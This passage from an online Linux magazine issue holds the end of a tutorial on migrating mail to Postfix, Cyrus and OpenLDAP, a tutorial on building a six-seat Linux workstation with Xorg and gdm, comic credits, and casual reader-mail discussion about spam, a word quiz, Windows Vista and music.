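An "OK" reply means that saslauthd reached the LDAP slave and verified the password; anything else points at the settings in /etc/saslauthd.conf.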
Now we turn to the other two configuration files, namely cyrus.conf and imapd.conf. I won't explain every single option; I'll focus on the things that connect our services instead. In order to make Cyrus use the SASL AUTH daemon for authentication, you need to check for the following entries in imapd.conf:
allowplaintext: yes
sasl_mech_list: PLAIN
sasl_pwcheck_method: saslauthd

Cyrus will then allow plaintext logins and ask saslauthd to verify the login credentials. I mentioned encryption earlier. Now you have to decide whether you want to force your mail clients to use encryption or not: you can either accept plaintext logins on unencrypted connections, or require a TLS session before the login. Either way, Cyrus needs to know about its key and certificate:
tls_cert_file: /etc/ldap/openldap/mailstore.example.net.cert
tls_key_file: /etc/ldap/openldap/mailstore.example.net.key
tls_ca_path: /etc/ssl/certs

The CA's certificate file must be stored in the directory /etc/ssl/certs/. Again you have a choice of policy: you can present a certificate your clients cannot verify and use TLS purely for encryption, or you can distribute your CA's certificate so that the clients verify the server's identity.
If you want to use the second method, you have to make sure that every mail client can verify your certificate. Thus the first way only encrypts, while the second checks for the right identity.
As for the settings that control mail delivery via IMAP or POP3, be sure to check for
popminpoll: 0
We initially ran our server with popminpoll: 1 to reduce the impact of impatient mail clients, but with that setting Cyrus will lock out any software that polls too often. Surprisingly, there are a lot of mail clients out there that do funny stuff with poll intervals and use multiple connections while polling email, so we switched the checks off - the load you save on the server will only be redirected to the phone support lines, and for us it wasn't worth the effort. The same is true for APOP. APOP is a way to hide the password from sniffers when fetching email. We prefer TLS, so we turn APOP off:
allowapop: no
You have to define admin users for the Cyrus server. Admin users are regular Cyrus users with extra privileges.
admins: cyrusadmin postmaster
lmtp_admins: lmtpadmin
We have two Cyrus superusers named cyrusadmin and postmaster (we need a postmaster mailbox anyway). We also have a separate admin called lmtpadmin. These accounts have passwords and can be used on the Cyrus command line or via the Cyrus Perl package Cyrus::IMAP::Admin.
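For manual work, the cyradm shell that comes with Cyrus offers short commands such as cm (create mailbox) and sq (set quota). A quick sketch, using the admin account from above and the UNIX hierarchy separator (the quota value is in kilobytes):

cyradm --user cyrusadmin localhost
localhost> cm user/rene.pfeiffer
localhost> sq user/rene.pfeiffer STORAGE 102400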
The migration of all user account metadata is done through the three Perl scripts. This takes care of any settings concerning login, email addresses, aliases, quotas and the like. Bear in mind that the three scripts work well enough, but they are not 100% accurate: you may miss some mail forwardings or other things. All this takes place on the LDAP side. We still have to deal with the IMAP mailboxes and their content.
Since we must all bow to the master LDAP tree, we came up with a script that reads every user description from the master, connects to the Cyrus IMAP server, compares the account information, and updates it on the Cyrus side, including the creation of new mailboxes. The Perl module Cyrus::IMAP::Admin is very handy for things like this. cyrus_syncboxes.pl does the synchronisation. It is designed to run on the mail server, since this server also carries an LDAP slave, but you can feed options to the script to make it talk to other hosts as well. Its documentation can be viewed by using perldoc cyrus_syncboxes.pl.
Now comes the critical moment: we need to migrate the users' mail. Gilles Lamiral has created a fine piece of software for this job, called imapsync. It synchronises IMAP boxes: run against a full IMAP box and an empty one, it recreates the folder structure of the full box on the empty one. You can use it like this:
imapsync --host1 oldserver.example.net --user1 r.pfeiffer --password1 XXXXXXXX \ --host2 newserver.example.net --user2 r.pfeiffer --password2 XXXXXXXX \ --syncinternaldates
It then copies the whole mailbox of user r.pfeiffer from oldserver.example.net to newserver.example.net. The switch --syncinternaldates preserves the internal timestamps of the messages. Every mail has two timestamps - the RFC 822 date in the header and the RFC 2060 Internal Date Message Attribute. Most IMAP clients can be configured to display either date. If you preserve the internal timestamps, you will have less trouble with IMAP clients, or with users getting confused by changed timestamps on messages. imapsync has many more features, but we only needed this one.
You have to call imapsync for every mailbox. If you have several thousand mailboxes, then you need to use a little shell script and a list of usernames with the passwords in CSV (Comma Separated Value) format.
user0001;password0001;user0002;password0002
user0011;password0011;user0012;password0012

We created a CSV list of all login data from our LDAP tree. When you have this list, you can pack the command into a shell loop and process the mailboxes in serial order. This fragment is taken from the imapsync documentation.
{ while IFS=';' read u1 p1 u2 p2; do
    imapsync --user1 "$u1" --password1 "$p1" \
             --user2 "$u2" --password2 "$p2" \
             --syncinternaldates
  done ; } < login_data.csv
Now is the time for some fresh coffee and the last checks before the new system goes online. The syncing of the mailboxes takes a while. We needed several hours for about 14 GB of mailbox data.
After doing all the steps I have described, you should have a shiny new mail system with lots of users and mailboxes. Before you put everything into production mode, you should spend some time testing the whole setup. You can tell Postfix not to reject mail permanently by using
soft_bounce = yes
in main.cf. If valid mail is rejected, you can see it in the logs and correct the settings. Also check the access to the mailboxes by using POP3 and IMAP clients. Leave the old server up for a while so that you can compare folder contents. If you are comfortable with everything, switch to production mode, but make sure you monitor the new system closely, as sketched below.
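A simple way to keep an eye on rejections while soft_bounce is active is to watch the mail log; the path below is the Debian default and may differ on your system:

tail -f /var/log/mail.log | grep -i reject

Well, have fun with the new setup!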
You need tools to get your work done. Here are ours.
Our own scripts were written exclusively with the help of Perl and Bash. This article includes all the scripts and configuration files necessary to tackle a mail migration from CommuniGate Pro to Postfix/Cyrus/OpenLDAP. Beyond that, you will need more tools, such as front ends for user administration; there are existing tools you can use, or you can write your own, depending on what you need.
No animals or software were harmed in the course of the migration. You might wish to take a look at the following tools and recipes and thank their authors.
Talkback: Discuss this article with The Answer Gang
René was born in the year of Atari's founding and the release of the game Pong. From early youth on, he took things apart to see how they worked, and he couldn't even pass construction sites without looking for electrical wires that might seem interesting. His interest in computing began when his grandfather bought him a 4-bit microcontroller with 256 bytes of RAM and a 4096-byte operating system, forcing him to learn assembler before any other language.
After finishing school, he went to university to study physics. Along the way he collected experience with a C64, a C128, two Amigas, DEC's Ultrix, OpenVMS, and finally GNU/Linux on a PC in 1997. He has been using Linux ever since, and still likes to take things apart and put them together again. The freedom of tinkering brought him close to the Free Software movement, where he puts some effort into the right to understand how things work. He is also involved with civil liberty groups focusing on digital rights.
Since 1999 he has been offering his skills as a freelancer. His main activities include system/network administration, scripting and consulting. In 2001 he started giving lectures on computer security at the Technikum Wien. Apart from staring into computer monitors, inspecting hardware and talking to network equipment, he is fond of scuba diving, writing, and photographing with his digital camera. He would like to have a go at storytelling and roleplaying again as soon as he finds some more spare time on his backup devices.
pooz is a system administrator/Web application hacker working in Vienna, Austria. Free/Open Source software has been his tool of choice since the early '90s.
By Bob Smith
A Multi-Seat Linux Box: This tutorial shows how to build a multi-head, multi-user Linux box using a recent distribution of Linux and standard USB keyboards and mice. Xorg calls this arrangement a "multi-seat" system.
Advantages of a Multi-Seat System: The advantages of multi-seat systems in schools, Internet cafes, and libraries include more than just saving money. They include much lower noise pollution, much less power consumption, and lowered space requirements. For many applications, power and noise budgets are as important as initial cost.
Requirements: To build a multi-seat system you need a video adapter, keyboard, and mouse for each seat. For six seats, you'll also need a motherboard with an AGP slot and five available PCI slots. In our test system we used USB keyboards and mice exclusively, but you can use a PS/2 keyboard and mouse for one of the seats if you wish.
Xorg 6.9 or later is required, but this already ships with many of the major distributions. Our test system uses the free version of Mandriva 2006 and we did not rebuild the kernel or install any additional packages.
If possible, try to use accelerated video cards, but for increased reliability, avoid video cards with on-board fans. Use recent video cards; older video cards often have a problem sharing the PCI bus. We've had good luck with nVidia cards but you can try recent cards from other manufacturers too.
Hardware for our test system: For our system we chose to use video cards based on the nVidia MX4000 chipset. They are accelerated, have no fans, and it was nice having one driver for all six video cards. The downside of nVidia is that the driver is closed source and you need to download and install it. If you use an nVidia card, be sure to check their web site for the recommended BIOS settings for your cards.
We used an ECS 755-A2 motherboard with an AMD64-3200 processor and 1 GB of RAM. Our power supply is a CoolMax 140mm Power Supply and the CPU heat sink is a Thermaltake "Sonic Tower". During our testing we added a low noise fan to cool the video cards. Airflow is in at the bottom, past the video cards, up past the CPU cooler and out through the power supply. This airflow seemed to work pretty well. At quiescence, the CPU temperature was 31C, rising to only 38C after fifteen minutes of kernel compile. The current from the mains at quiescence was 0.25 amps, and during a kernel compile it was 0.35 amps.
You will probably need some USB hubs to connect all of the keyboards and mice. One problem to think about before permanently installing the hardware is cable management. Seven power cords, six monitor cables, three USB hubs, six keyboard cables, and six mouse cables: that is a lot of cabling!
Do the installation with all of the hardware connected and powered up. Mandriva did a great job detecting and configuring all six of our video heads. Select a default run level of 3 so that X does not start automatically after boot. You can check the installation by logging in and running startx. If all has gone well you should be able to move your mouse across all six monitors.
Mandriva allows up to ten entries in the /dev/input directory. We needed twelve, since we had six keyboards and six mice. We increased the limit to sixteen by changing the line in /etc/udev/rules.d/50-mdk.rules from:

KERNEL=="event[0-9]*", NAME="input/%k", MODE="0600"

to:

KERNEL=="event[0-9a-f]*", NAME="input/%k", MODE="0600"
Video cards are identified by their address on the PCI bus. We can list the hardware on the PCI buses using the lspci command. On our test system, the lspci command gives the following result:
lspci | grep VGA
00:09.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)
00:0a.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)
00:0b.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)
00:0c.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)
00:0d.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)
01:00.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)

The bus address is the first field in the lines above. The number before the colon identifies which PCI bus (computers often have more than one), and the second number gives the card address on the bus. You will need to know these addresses to build the xorg.conf configuration file.
The mice are easy to locate. Each mouse has an entry in the /dev/input directory. An ls can identify the mice.
ls /dev/input/mouse*
/dev/input/mouse0  /dev/input/mouse2  /dev/input/mouse4
/dev/input/mouse1  /dev/input/mouse3  /dev/input/mouse5

The keyboards are identified as /dev/input/eventN files. Run more /proc/bus/input/devices; each keyboard will have an entry that specifies its event file. The following two entries are for the first two keyboards in our system.
more /proc/bus/input/devices

I: Bus=0003 Vendor=046e Product=530a Version=0001
N: Name="BTC Multimedia USB Keyboard"
P: Phys=usb-0000:00:03.3-4.2.1/input0
H: Handlers=kbd event6
B: EV=120003
B: KEY=1000000000007 ff87207ac14057ff febeffdfffefffff fffffffffffffffe
B: LED=1f

I: Bus=0003 Vendor=046e Product=530a Version=0001
N: Name="BTC Multimedia USB Keyboard"
P: Phys=usb-0000:00:03.3-4.4.1/input0
H: Handlers=kbd event7
B: EV=120003
B: KEY=1000000000007 ff87207ac14057ff febeffdfffefffff fffffffffffffffe
B: LED=1f
A table is a nice way to view all of the above information.
Seat   Video Card   Keyboard (/dev/input/)   Mouse (/dev/input/)
 0     00:09:0      event6                   mouse0
 1     00:10:0      event7                   mouse1
 2     00:11:0      event8                   mouse2
 3     00:12:0      event9                   mouse3
 4     00:13:0      event10                  mouse4
 5     01:00:0      event11                  mouse5
Note the slight change in how the video cards are addressed. Also, you'll find the numbering of the keyboards and mice easier if you plug each mouse into the same hub as its corresponding keyboard. Don't worry too much about matching the video head to the keyboard. After setting everything up you can move the monitors or the keyboards around as needed.
# Seat 5
Section "InputDevice"
    Identifier  "Keyboard5"
    Driver      "evdev"
    Option      "Device" "/dev/input/event11"
    Option      "XkbModel" "pc105"
    Option      "XkbLayout" "us"
    Option      "XkbOptions" "compose:rwin"
EndSection

Section "InputDevice"
    Identifier  "Mouse5"
    Driver      "mouse"
    Option      "Protocol" "ExplorerPS/2"
    Option      "Device" "/dev/input/mouse5"
    Option      "ZAxisMapping" "6 7"
EndSection

Section "Device"
    Identifier  "device5"
    Driver      "nvidia"
    VendorName  "NVIDIA Corp."
    BoardName   "NVIDIA GeForce4 (generic)"
    BusID       "PCI:1:0:0"
EndSection

Section "Monitor"
    Identifier  "monitor5"
    ModelName   "Flat Panel 1024x768"
    HorizSync   31.5 - 48.5
    VertRefresh 40.0 - 70.0
    ModeLine    "768x576" 50.0 768 832 846 1000 576 590 595 630
    ModeLine    "768x576" 63.1 768 800 960 1024 576 578 590 616
EndSection

Section "Screen"
    Identifier  "screen5"
    Device      "device5"
    Monitor     "monitor5"
    DefaultDepth 24
    SubSection "Display"
        Virtual 1024 768
        Depth   24
    EndSubSection
EndSection

Section "ServerLayout"
    Identifier  "seat5"
    Screen 0    "screen5" 0 0
    InputDevice "Mouse5" "CorePointer"
    InputDevice "Keyboard5" "CoreKeyboard"
EndSection

There is a simple trick to help verify that all the numbers in the xorg.conf file are right -- pass the file through sort and uniq.
sort /etc/X11/xorg.conf | uniq
[ 'sort xorg.conf|uniq -d' would also be helpful - just in case you had mistakenly repeated any of the device strings. -- Ben ]
The output of the above command string will make obvious any errors in numbering the various keyboards and such.
Testing Your Xorg.conf File: It is a good idea to test
your configuration and to sort out the keyboards and mice by
bringing up the heads one at a time. Log in remotely so that you
are not using any of the video heads. Enter the following commands
for each of the six heads (0 to 5). (The commands below are for
head 5.)
X -novtswitch -sharevts -nolisten tcp -layout seat5 :5 &
xterm -display :5 &

If the above command fails, examine the error messages and check the xorg.conf file. If the command succeeds, use the xterm to help identify which keyboard and mouse go to which head. The keyboards, mice, and video cards are enumerated in the same order on every boot, so you will only have to move things around during the initial set up.
The above commands might be sufficient if you don't need user logins. For example, a six headed kiosk might need only X and a web browser on each head.
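For such a kiosk you could skip gdm entirely and start all six servers from a small shell loop; a sketch, reusing the commands from above (the choice of firefox as the browser is just an example):

for i in 0 1 2 3 4 5; do
    X -novtswitch -sharevts -nolisten tcp -layout seat$i :$i &
    sleep 2                     # give each X server a moment to start
    DISPLAY=:$i firefox &       # any browser or kiosk application will do
done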
Modify the [servers] section near the bottom of the /etc/X11/gdm/gdm.conf file to tell gdm which X servers to start. The lines should be:
0=Standard0
1=Standard1
2=Standard2
3=Standard3
4=Standard4
5=Standard5

You need to tell gdm how to start the X server on each head. The lines to do this are:
[server-Standard5]
name=Standard server
command=/usr/X11R6/bin/X -nolisten tcp -novtswitch -sharevts -layout seat5
flexible=true

You'll need a section like the above for each head. The server name, "Standard5" in the above example, must match the name given in the [servers] section. Customize the X command line options to meet the requirements of your particular system.
Once everything is configured, you should be able to start graphical logins by switching to runlevel 5.
telinit 5

If everything works, make the default runlevel 5 by editing /etc/inittab or by setting it using drakconf.
Cost: Not including the monitor, each seat in our system cost about $67. This includes $40 for the MX4000 based video card, $20 for a USB keyboard, $5 for a USB mouse, and $2 for half of a USB hub. Our test system used expensive keyboards that have a built-in USB hub which we intended for per-user flash drives or audio players.
The shared part of our system cost about $520. This includes $180 for the CPU, $50 for the motherboard, $90 for RAM, and $50 for the CPU heat sink. The case, power supply, and disk drive had a combined cost of about $150.
We give these prices just for comparison. You may find lower prices than these, and we'd certainly recommend that you replace our $230 CPU and motherboard with an Athlon 2800+ set that costs about $80. We have not included the cost of the monitors, since their prices are in free fall and your particular needs and tastes may dictate what you spend.
Problems: Did you catch the phrase "between resets" above?
While the system worked very well, it was extremely unstable. In
particular, we got a kernel oops fairly often when we logged out.
A syslog trace of one such oops is available
here. We've tried several things to fix this problem.
A much less severe problem is that some programs assume that there is a single user on the PC. Screen savers can take a lot of CPU power and both KDE and Gnome complain if they don't have audio output. Any shared resource, such as audio or a CD burner, can be a problem.
As a longer-term concern, we will need to address security issues surrounding multi-seat computers. Whether from students or cafe patrons, these systems are going to come under deliberate, malicious attack. Can we trust KDE and Gnome to withstand such attacks?
Xorg man pages: Xorg provides a full set of manual pages that
describe the xorg.conf file and all of the commands used in getting
X-Windows to run. The manual page for xorg.conf is at:
http://wiki.x.org/X11R6.9.0/doc/html/xorg.conf.5.html
The manual pages for the X commands are at:
http://wiki.x.org/X11R6.9.0/doc/html/manindex1.html
Talkback: Discuss this article with The Answer Gang
Bob is an electronics hobbyist and Linux programmer. He is one of the authors of "Linux Appliance Design" to be published by No Starch Press.
These images are scaled down to minimize horizontal scrolling.
All HelpDex cartoons are at Shane's web site, www.shanecollinge.com.
Talkback: Discuss this article with The Answer Gang
Part computer programmer, part cartoonist, part Mars Bar. At night, he runs
around in his brightly-coloured underwear fighting criminals. During the
day... well, he just runs around in his brightly-coloured underwear. He
eats when he's hungry and sleeps when he's sleepy.
The Ecol comic strip is written for escomposlinux.org (ECOL), the web site that supports es.comp.os.linux, the Spanish USENET newsgroup for Linux. The strips are drawn in Spanish and then translated to English by the author.
These images are scaled down to minimize horizontal scrolling.
All Ecol cartoons are at tira.escomposlinux.org (Spanish), comic.escomposlinux.org (English) and http://tira.puntbarra.com/ (Catalan). The Catalan version is translated by the people who run the site; only a few episodes are currently available.
These cartoons are copyright Javier Malonda. They may be copied, linked or distributed by any means. However, you may not distribute modifications. If you link to a cartoon, please notify Javier, who would appreciate hearing from you.
Talkback: Discuss this article with The Answer Gang
Fri, 03 Feb 2006
From Susan Brown
[Jimmy] I just find this incredibly amusing... but, I am easily amused
James,
If you are a superstar and have exceptional customer service skills, come join our professional team!
$SPAMMERIFFIC Corporate Resources is currently seeking a top-notch staffing manager to work with our light industrial team. This is a staff position located within $SPAMMERIFFIC.
$SPAMMERIFFIC Corporate Resources is a regional market leader in the delivery of diversified, high quality employment services. We offer a complete range of employment opportunities: temporary, temporary-to-hire, direct-hire and contract. $SPAMMERIFFIC specializes in placements for administrative and clerical positions, accounting and finance, legal/medical, mortgage/insurance, professional/technical, light industrial, and engineering. $SPAMMERIFFIC brings top-flight companies and outstanding professionals together. We care about character and quality, and our passion is to match the world's most innovative people with the world's most innovative companies. And we strive to do it better than anyone else!
Position requires; strong organizational skills; ability to work as part of a team; strong communication and time management skills; a drive to succeed; ability to multi-task, good follow through, and professional demeanor. This position offers a competitive pay structure including commission and benefits! E-mail resume and salary requirements to head_spammer@spammeriffic.com.
www.$SPAMMERIFFICcorp.com
********************************************************************** The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. **********************************************************************
[Jimmy] I love these... I think I'll collect the whole set
Sat, 04 Feb 2006
From Jerry Matheny
[Jimmy] Ah. I guess Ben changed the old list addresses in the back issues...
Are you the "Big D from LV"?
Wed, 15 Feb 2006
From Benjamin A. Okopnik
From Bruce Schneier's "Cryptogram":
The Department of Homeland Security is funding the security of
open-source products, including Linux, Apache, MySQL, FreeBSD, Mozilla,
and Sendmail. I think this is a great use of public funds. One of the
limitations of open-source development is that it's hard to fund tools
like Coverity. And this kind of thing improves security for a lot of
different organizations against a wide variety of threats. And it
increases competition with Microsoft, which will force it to improve
its OS as well. Everybody wins.
http://www.eweek.com/article2/0,1895,1909946,00.asp
[Jimmy] This spawned a long thread...
See attached dhs.html
[Jimmy] There was also a lengthy thread about the use of flash in LG
See attached flash.html
Mon, 06 Feb 2006
From Predrag Ivanovic
I would love to see your answers (I got 8/33). This is hard.
[Jimmy] I was talking about this sort of thing with a girl I know the other day. To really know a language, you have to know the popular culture in that language, the kinds of things kids learn, etc. To her credit, she has been reading some English-language fairy tales -- I can think of quite a few movies and books that would make absolutely no sense if you had never heard "Little Red Riding Hood", for example.
At least it says "if you excuse the cultural bias".
[Brian] But perhaps not biased enough. I didn't see "50 W to L Y L", nor did I see "1 is the L N". Even though I went to a school where rugby was played (although my mission was to drink the beer), I missed that one (and several others)
There certainly should have been "2 W on a P", in our context.
27/33
[Jimmy] I'll bet you didn't get 3 B M (S H T R): 3 blind mice (see how they run). "39 B of the O T" nearly eluded me, as I was raised to consider there to be 45, not 39
[Breen] Cultural bias indeed. I don't think many on this side of the pond would have got 6 B to an O in C. (I did but I'm eccentric...)
[Frodo] LOL - I guess you are in a minority indeed with that answer, in North America.
The one that took me longest was "9 P in S A" - I was never taught that fact in school.
[Breen] I noticed the O T ambiguity, too.
[Frodo] The only reason I got that one, was cause it said "66 B of the B".
[Jimmy] Erm... still the same thing, because C have the 6 B of the A.
[Jimmy] Oh... 25/33
[Breen] 30/33 here.
[Frodo] Almost ashamed... 33/33
My love for trivia quizzes and such helped, I guess.
[Breen] Quizzes like this have been around for quite a while - I first saw one about 25 years ago in Games Magazine - it even had some of the same questions.
[Sluggo] But what does this have to do with intelligence? It's just recognizing pop phrases.
[Jimmy] Not really. Many of the items were facts that most people should be able to recognise: 90 D in a R A, 24 H in a D, etc. Some were extremely culturally biased: I only figured out "6 B to an O in C" after Breen mentioned being on the wrong side of the pond for it
[Kat] The process of "solving the puzzle" is a certain sort of brainpower. Sorta.
Meanwhile, I've managed to get to 32/33, but #30 is still eluding me.
[Ben] [grin] So how many did you get, Mike? As it says at the bottom, it tests verbal ability and linguistic pattern recognition - which are, in large measure, what many IQ tests consist of. You should do pretty well.
Me, I'm giving up after spending most of an hour on it; it's obvious that I'm dumb as a brick. On the other hand, I've got a strong suspicion that the four I didn't get (14, 19, 30, and 31) have to do with things that I just have no clue about - i.e., I think 31 has something to do with cricket, and 19 is some damn special version of 'unlucky Friday' that I just can't get.
[Brian] And of course I suffer the fate of smartasses everywhere. A flip answer springs to mind (say, "13 Levels in Barad Dur"), and the true answer has no route past the image thereby entrenched.
[Ben] [LAUGH] Yeah. I got hung up on the whole Bible-related tone of the thing for a while (how the heck would I know about that stuff, other than just having basic familiarity with the context and the poetry of the thing?) - couldn't get past "in C" looking like "in church" every time I looked at it.
[Brian] But those sorts of teasers are fun, although I suspect far less indicative than some believe.
[Ben] It's not usually the type of thing that I'm into - although this one was fun. I used to do the NY Times crossword puzzle on the way to work when I was living in Brooklyn. The train took 52 minutes (+/- a minute or two) from my stop to 34th Street in Manhattan, and I could usually finish it before I got off the train - although Fridays were tough (about 50/50). I don't know if they still do this, but the crosswords in NY Times used to get progressively harder throughout the week.
[Kat] Yes, they do, so far as I know.
[Breen] They certainly do. Saturday is the toughest. Sundays are sui generis - a completely different sort of puzz (besides being 21x21 instead of 15x15). [I also hang out online with puzzle constructors.]
[Kat] Incidentally, when I passed this link on to a puzzle-loving friend, I was informed that it's actually copyright Games magazine.
[Breen] Right - although you can't easily copyright the type of puzzle, many of the clues are right out of the original in Games lo, these many years ago.
[Sluggo] I think I've said it before, but...
Two plus two is four
Four times three is twelve
Twelve inches make a ruler
A famous ruler was Queen Elizabeth
Queen Elizabeth sailed the ocean
Oceans have fish, fish have fins
The Finns fought the Russians
Russians are red, so fire engines are red
'Cause they're always rushin'
'Course, when did Lizzie I ever get in a boat? Or is this II?
[Jason] Got about half of them, then gave up/got bored. Tried to look in the JavaScript to see what the answers were for the ones I missed, but they were smart enough to use SHA1. But we know the first letter of each word, and only a couple of words are unknown for each question, so a dictionary attack is probably feasible...
[Thomas] B T C, J. For the record, I scored 25. It's not an intelligence test in the slightest, mind -- so don't feel bad about any of it.
[Jimmy] It only dawned on me yesterday what "100 C in a D" was. While I was shaving. Ouch!
[Rick] It's a bit culture-biased, isn't it?
[Kapil] Some entirely outrageous ones have been included in an effort to make the test more "culture-inclusive". One of my friends discovered what "9 P in S A" was and even with "Google Earth" or the equivalent I wouldn't have ever known enough to answer that.
In fact, some of the culture-specific ones were easier for me, because I assumed that the author of these tests had a certain cultural bias and factored that into the guesses I made. So even though I didn't know (e.g.) that there were "39 B in the O T", I could guess the answer, and then the web page (with JavaScript enabled) verified that my guess was correct.
I liked the way the author of the tests had made them impossible to cheat on. Maybe it is now standard practice for on-line tests but it was a new one on me.
[Rick] But, e.g., the Brits might find "100 P in a P" somewhat mysterious.
[Jimmy] 100 peas in a pod?
[Jay] It's harder when they don't have the intelligence themselves to parse the responses only for keywords. If leaving out the number they put on the prompt from the reply makes me wrong, I'm smarter than they are, and I can't be bothered.
Mon, 23 Jan 2006
From Benjamin A. Okopnik
[Jimmy] This thread kept going...
Yes, but for *whom?*
http://www.gmtoday.com/news/technology/computers/topstory20.asp
Seems that Vista is going to require machines with more resources than (my estimate) half the US population, and probably 95% of the people in the rest of the world, own.
To be sure, Microsoft has said lesser computers will still be capable of running Vista, just with some of the special features that differentiate it from older versions of Wind0ws automatically turned off.
"Lesser" computers? I love it.
Dell has a section on its Web site, at www.dell.com/vista, which highlights computers the company recommends for those planning to upgrade to Vista. For models for the home and home office, the recommended desktop is priced at $1,749. The laptop costs $2,699.
Better and better, every day. Y'all ready to rush right out and buy the top-buck gizmo of the day?
[Pedja] Ben, Vista is scheduled to launch at Christmas this year, right? Do you think that is a coincidence? By that time, "Vista-ready" computers (Micr0$0ft's recommended hardware, times two) won't be all that uncommon, and Christmas shopping madness will do the rest. Same story as when XP launched, what, 5 years ago?
It's the same old formula that Micr0s0ft has been using all along - however, at this point, it's been turned on its head. Yes, the US is where most of the computer buying power is - but the top of the market is by far not the only buying public out there. Neither Joe Average in Chicago nor his cousin Giuseppe Averaggio in Milan (nor most of their other relatives all over the world) can afford to just toss their current system just because Micr0s0ft has decreed that they should; aside from the expense, other considerations - e.g., the hassle of installing all the new hardware, dealing with replacing anything that fails to work, adapting to the new system, "upgrading" the software that turns out to be non-compatible with their new OS - make it a very low-percentage game. Yeah, there are new adopters all over the place - but many of those have already installed Linux, anyway. Yeah, there are companies that, for various (generally non-technical) reasons will "upgrade" to Vista... but given the general awareness of Linux now, and the fact that people realize that changing over is going to require adapting anyway, there's a certain (and I believe, large) percentage of people that will decide to get out of that game and switch to Linux.
This is besides the fact that there are more and more companies and individuals switching over every day.
(*Don't* anybody breathe. If Micr0s0ft actually falls for this one, we're home free.)
[Pedja] Will you please explain?
Sure. If you don't have a whole lot of spare cash, and your computer is becoming less and less usable day by day (remember what happened shortly after XP appeared?)
[Pedja] Yes, the hype was massive. "The only OS you'll ever need,mangles your files and cures cancer (has dancing hamster in technicolor, too!)". Heh. That's madness, I tell you, madness...
- and particularly if you need to produce documents, etc., for business purposes _and can't_ due to progressive OS/software incompatibilities, then where are you going to go? This kind of heavy-handed, bull-in-a-china-shop moves by the Redmond folks drive wagonloads of people over to Linux, and from a certain cynical perspective, I'm actually glad to see them doing it.
[Pedja] Arrogance will bury them, DRM and 'trusted computing' too. Imagine Joe Average User trying to rip his S0ny 'enhanced' CD using WMP 11, or installing 'unapproved' software to his brand new Vi$ta machine, and failing. Imagine man realizing that he is 0wned and his freedom to do whatever he bloody wants with things he paid for, taken away from him 'for his own good'. Imagine his anger and frustration. And then he hears of this Linux thing, which has its own quirks, but it's all about freedom. Is this a dawn of the new era, Ben? We can only hope so .
Fri, 10 Feb 2006
From Mike Orr
http://seattlepi.nwsource.com/theater/259118_wedding11q.html Review of "The Wedding Singer" play, a 1985 cliche-o-drama
(No, I haven't seen it.)
[Jimmy] Looks like it's based on the Adam Sandler movie.
On a similarly 80s note, I whiled away the hours at work last night listening to The Cure's Greatest Hits
[Thomas] Which? Staring At The Sea was a nice album.
[Jimmy] Greatest Hits. It's a CD/DVD package.
[Thomas] Talking of which, I'm listening to The TearDrop Explodes. I much preferred Julian Cope's solo work -- but it's still good, nevertheless.
[Jimmy] Never really got into them, though I do get mixed up between them and Echo and the Bunnymen, for some strange reason.
I suppose I'll find out when my sister gets into them -- she has a bad case of 80s envy.
[Thomas] That's not so strange when you consider that Ian McCulloch, who was briefly a member of The Teardrop Explodes, went on to be the lead singer of Echo and the Bunnymen.
[Jimmy] Ah. Well, Dave Fanning (Ireland's closest equivalent to John Peel) used to play them, but at the time I was more into grunge and punk[1] stuff.
I miss those simpler times, when MTV played music and everything was on one channel, so you were exposed to different genres instead of just whatever's in favour with 14-year-old girls today.
My friend is a writer for Time, which owns People. He says People is by far the best-selling magazine in the industry. I couldn't believe it -- who reads People? But it's all those women in check-out lines picking it up.
[Jimmy] Don't forget doctors' and dentists' waiting rooms!
[Thomas] This is true. I can remember, about six or seven years ago, when my parents first got Sky. Back then, the MTV2 channel would just play listeners' requests for music videos continuously, in one-hour slots.
[Jimmy] Eek. I'm thinking of, say, 11 years ago, when there was just one MTV Europe, and everything was... well, like the MTV2 you described.
They did have some oddball programmes with the odd live band, but mostly it was music with a minimum of chatter.
[Thomas] Typically there'd be fifteen songs in an hour. It was great. The eclectic mix of music and genres was indeed an eye-opener.
There's a new American radio format like this, although it's programmed rather than request-driven. They have a large playlist covering a wide variety of rock genres (60s-00s), and they play them in random order, even if that puts dissimilar songs next to each other. Supposedly it's popular because people are tired of hearing the same old songs again and again. It was started by one network ("JACK FM"), but other stations are doing it too. The LA station has the most interesting website: http://www.931jackfm.com
[Thomas] Alas, the format is no more -- it has gone the American way of: "Random talking with whiny Americans is what the people want, whilst getting out of playing music."
[Jimmy] Well, they still have those kinds of programmes, but only at insomniac hours.
They even have a metal show that plays videos by bands like Nile. Much as I love them, I don't understand why they bother to make videos, knowing they have such limited appeal.
[Jimmy] (Queens of the Stone Age's "Songs for the Deaf" album has fake American DJ banter between songs. One of the best goes "K.L.O.N. - Clone Radio. We sound more like everybody else than anybody else". Rings oh-so-true.)
[1] Though probably not anything Mike would consider to be punk, apart from the Sex Pistols and the Ramones. Maybe.
[Thomas] Patti Smith.
Haha. I have a soft spot for the early "non-punk" punk bands like Blondie. But for later punk, it's gotta be early-80s oi/punk or I'm not interested. Innovation is fine -- psychobilly is cool, and I'd like to hear more punk/surf (Agent Orange). Just keep the same tempo and staccato. And my aversion to metal influences in punk remains.
[Jimmy] I like the hardcore stuff... punk, but faster, and with musical ability. But, as I've said before, that stuff didn't come from having metal influences; if anything, the reverse was the case.
Hardcore is too monotonous for me. No, it didn't come from metal. I'm talking about metal influences on individual bands, or the punk/metal hybrids, as well as Motorhead and AC/DC sneaking into punk bands' repertoire. Like this one local band, Contingent, that an acquaintance sings in. It's called hardcore. Um, no it isn't.
[Jimmy] Well... you can't really help AC/DC slipping in as an influence for almost any rock band since the 70s. Or Spinal Tap.
Not just an influence. Dropkick Murphys actually perform AC/DC songs at shows.
Punk attitude: angry losers
Punk music: fast but not extremely so; staccato; unique rhythms and vocal styles
Punk look: trim and tight

